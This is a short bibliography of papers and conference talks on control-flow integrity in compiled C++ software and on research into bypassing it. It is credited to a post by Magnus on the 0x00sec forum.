- Control-Flow Integrity: Attacks and Protections
- Control-Flow Bending: On the Effectiveness of Control-Flow Integrity
- Out Of Control: Overcoming Control-Flow Integrity
- Stitching the Gadgets: On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection
- Control Jujutsu: On the Weaknesses of Fine-Grained Control Flow Integrity
- Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications
- Black Hat USA 2025 | Breaking Control Flow Integrity by Abusing Modern C++
- Itanium C++ ABI: Exception Handling ($Revision: 1.22 $)
- NDSS 2023 - Let Me Unwind That For You: Exceptions to Backward-Edge Protection
- Await() a Second: Evading Control Flow Integrity by Hijacking C++ Coroutines
Original post by Magnus, from the 0x00sec forum.